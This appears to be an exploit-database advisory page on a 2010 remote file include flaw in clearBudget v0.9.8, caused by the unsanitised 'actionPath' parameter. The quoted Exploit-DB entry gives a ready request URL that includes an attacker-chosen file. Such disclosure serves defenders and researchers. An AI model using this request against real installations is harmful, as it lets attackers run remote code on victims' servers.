header-logo
Suggest Exploit
vendor:
clearBudget
by:
Offensive
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: clearBudget
Affected Version From: v0.9.8
Affected Version To: v0.9.8
Patch Exists: NO
Related CWE: N/A
CPE: a:clearbudget:clearbudget:0.9.8
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP
2010

clearBudget v0.9.8 Remote File Include

A Remote File Include vulnerability exists in clearBudget v0.9.8. An attacker can exploit this vulnerability to include a remote file containing malicious code and execute it on the vulnerable system. The vulnerability is due to the 'actionPath' parameter in the 'controller.class.php' script not properly sanitized before being used to include a file. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request containing a URL in the 'actionPath' parameter to include a remote file containing malicious code and execute it on the vulnerable system.

Mitigation:

Input validation should be used to ensure that untrusted input is not used to include or execute files.
Source

Exploit-DB raw data:

# Exploit Title: clearBudget v0.9.8 Remote File Include
# Date: 10/08/2010
# Author: Offensive [Offsensive@live.com] ~ Red-Stone On Community !
# Software Link: [ http://www.clearbudget.net ]
# Version : v0.9.8
# Tested on: Windows XP

C0nditi0ns : PHP Version > 4.x.x
Expl0it Code : http://target/clearBudget.0.9.8/logic/controller.class.php?actionPath=[file]

Ramadan Kareem !
Gr33t'z : SA-h4x0r ~ LoOoRd ~ Inj3ct0r M3ms & T3am

Navigation

Suggest Exploit

Services By CQR